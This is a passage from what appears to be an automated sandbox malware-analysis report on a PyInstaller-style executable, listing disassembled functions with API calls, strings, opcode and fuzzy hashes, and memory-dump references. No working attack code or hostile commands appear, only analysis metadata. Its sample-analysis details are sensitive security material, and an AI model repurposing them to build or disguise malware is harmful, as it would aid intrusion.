                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                  • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                                  • Instruction ID: 48cde7b6e7f1a1f1efe7b7e5c2d3d300cb79c5d51ceb05f7c85bcfa5b7596da5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05F05E01B1C24744FE7477765811AB99190DF5C7A0FC806309CAE862C5FE6CEC60C130

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00007FF79DAF4F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF79DAF4F55
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAF48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79DAF48BC
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAE9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF79DAF2032,?,?,?,00007FF79DAF206F,?,?,00000000,00007FF79DAF2535,?,?,?,00007FF79DAF2467), ref: 00007FF79DAE9C6E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAE9C58: GetLastError.KERNEL32(?,?,?,00007FF79DAF2032,?,?,?,00007FF79DAF206F,?,?,00000000,00007FF79DAF2535,?,?,?,00007FF79DAF2467), ref: 00007FF79DAE9C78
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAE9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF79DAE9BEF,?,?,?,?,?,00007FF79DAE9ADA), ref: 00007FF79DAE9C19
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAE9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF79DAE9BEF,?,?,?,?,?,00007FF79DAE9ADA), ref: 00007FF79DAE9C3E
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF79DAF4F44
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAF4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79DAF491C
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF79DAF51BA
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF79DAF51CB
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF79DAF51DC
                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79DAF541C), ref: 00007FF79DAF5203
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4070488512-0
                                                                                                                                                                                                                                  • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                                  • Instruction ID: 7d7feb723e6e7aa57320047b1ec987306f5209a34f31c0355f96828311caa27d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AD19026A0C24245E730FF3AD8429F9A6A1EF54784FC44136DA8D47695FF7CE861C760
                                                                                                                                                                                                                                  Function 00007FF79DADC62C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                                                                                                                                                                                  • Instruction ID: e629edcaa9516176ffac8f8bf9a860dda7ddc26fbf6adba3c40f30d052af6cb8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CA0022191CC26D0E668AF28E861975B730FB54300FC42072D09D410E0BF3CAC20C331
                                                                                                                                                                                                                                  Function 00007FF79DAD50B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF79DAD5C57,?,00007FF79DAD308E), ref: 00007FF79DAD50C0
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF79DAD5C57,?,00007FF79DAD308E), ref: 00007FF79DAD5101
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF79DAD5C57,?,00007FF79DAD308E), ref: 00007FF79DAD5126
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF79DAD5C57,?,00007FF79DAD308E), ref: 00007FF79DAD514B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF79DAD5C57,?,00007FF79DAD308E), ref: 00007FF79DAD5173
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF79DAD5C57,?,00007FF79DAD308E), ref: 00007FF79DAD519B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF79DAD5C57,?,00007FF79DAD308E), ref: 00007FF79DAD51C3
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF79DAD5C57,?,00007FF79DAD308E), ref: 00007FF79DAD51EB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF79DAD5C57,?,00007FF79DAD308E), ref: 00007FF79DAD5213
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                  • API String ID: 190572456-2007157414
                                                                                                                                                                                                                                  • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                                  • Instruction ID: 5173ef4a8e39fa7ef497ef048877f8225369c065ae59420bffabef9057793d35
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3412966490DB0390EA75FB79AC619F4A6A1EF19750BD41476C8CE123A4FF3CBD688360
                                                                                                                                                                                                                                  Function 00007FF79DAD6EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                  • API String ID: 190572456-3427451314
                                                                                                                                                                                                                                  • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                                  • Instruction ID: b541506e467e02dbdd8993b5f48817f1474dddda3404ac6f6d0e959dc81c3976
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EE1A96490DB0794EA35FB78A8519F4A765EF08B50FC81076C8CE023A4FF3CAD689361
                                                                                                                                                                                                                                  Function 00007FF79DAD20F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                  • String ID: P%
                                                                                                                                                                                                                                  • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                  • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                                  • Instruction ID: c3f6110f3ce2383d1eb5cf8088c5d2d095a5c17d6405702ebcb2a8ab9953e336
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79511626618BA186D6349F36A4185BAF7B1F798B61F404121EBCE43684EF3CD495DB20
                                                                                                                                                                                                                                  Function 00007FF79DAE55A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: -$:$f$p$p
                                                                                                                                                                                                                                  • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                  • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                                  • Instruction ID: dbf95e35522b0b5e5b8b89a51475e1ecc7b17a79664c4499a2a911394d5913ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34128261A0C24386FB34BB25B854AB9B661EBA8750FD44035D6C9475C4FB3CEDA0CB30
                                                                                                                                                                                                                                  Function 00007FF79DAD1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                  • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                  • Opcode ID: 72484fada2e7acaf6445e2aab44b47c8e2a5d3f4261e5c09252bce3f9252a7d9
                                                                                                                                                                                                                                  • Instruction ID: fe7bf59add70068c4087db94dbeafee79efa450da3b512bba7949cbf36243840
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72484fada2e7acaf6445e2aab44b47c8e2a5d3f4261e5c09252bce3f9252a7d9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F418121B0C64241EA30BB26E8619B6E6A1FB54BC4F844436ED9D47BD5FE3CE9258360
                                                                                                                                                                                                                                  Function 00007FF79DADDD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                                                                  • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                                  • Instruction ID: 52bb0ff78847a68f0093f929f659b015de43cbaef8c1f299957f482abfe2b19d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BD18E32A0C7418AEB30AB75D4507ADB7A0FB55788F900135EACD57B95EF38E9A1C710
                                                                                                                                                                                                                                  Function 00007FF79DAEA5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF79DAE43FD,?,?,?,?,00007FF79DAE979A,?,?,?,?,00007FF79DAE649F), ref: 00007FF79DAEA5E7
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF79DAE43FD,?,?,?,?,00007FF79DAE979A,?,?,?,?,00007FF79DAE649F), ref: 00007FF79DAEA61D
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF79DAE43FD,?,?,?,?,00007FF79DAE979A,?,?,?,?,00007FF79DAE649F), ref: 00007FF79DAEA64A
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF79DAE43FD,?,?,?,?,00007FF79DAE979A,?,?,?,?,00007FF79DAE649F), ref: 00007FF79DAEA65B
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF79DAE43FD,?,?,?,?,00007FF79DAE979A,?,?,?,?,00007FF79DAE649F), ref: 00007FF79DAEA66C
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF79DAE43FD,?,?,?,?,00007FF79DAE979A,?,?,?,?,00007FF79DAE649F), ref: 00007FF79DAEA687
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                  • Opcode ID: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                                                                                                                                                                  • Instruction ID: cfe62476b5a53a5e0f9c49c7e337d9a24c6d3ae4a9b6aab30793e20f63f51de5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75113820B0C64242FA747735A651979E292DF8D7A0F944734E8BF166DAFE2CAC21C731
                                                                                                                                                                                                                                  Function 00007FF79DAE8DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                                  • Instruction ID: 6473957d0ef28fc11ac9abf09a6dcfa1b3b40d1953ff585d3fc38b69c16e5253
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7F06221A1D70281EA34AB38E485B799730EF897A1FD40736C5AD462F4EF2CD859C320
                                                                                                                                                                                                                                  Function 00007FF79DAF8678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
